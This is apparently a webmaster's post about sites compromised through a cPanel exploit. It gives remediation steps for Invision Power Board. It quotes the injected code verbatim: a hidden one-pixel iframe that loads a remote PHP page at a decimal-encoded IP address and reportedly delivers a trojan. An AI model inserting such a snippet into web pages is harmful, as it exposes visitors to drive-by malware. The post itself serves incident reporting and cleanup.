Today I got a PM from one of my users regarding a virus notification while visiting one of my sites.

After some hunting, it seems people had used a cPanel exploit that the server was open to for only a very short time (we patched within a half hour of hte advisory going live) to inject some code into the site source code.

The virus is supposidly "VBS/PSYME", a trojan.

The code that's being injected into many sites is:

<span style="visibility: hidden"><iframe src="http://1109226593/gh/index2.php" width="1" height="1"></iframe></span>

Possible fix for Invision Power Board

The script seems to have hit any files that get included a lot.

For one of my sites, we found it attached to the very end of the conf_global file, and littered all over the 'cache' folder.

On IPB 2 you can do a 'rebuild all skin caches' options, and this will wipe out all traces of it.

Techy notes

It seems the 1109226593 is a long IP form of "". The server seems down right now, but even so :-)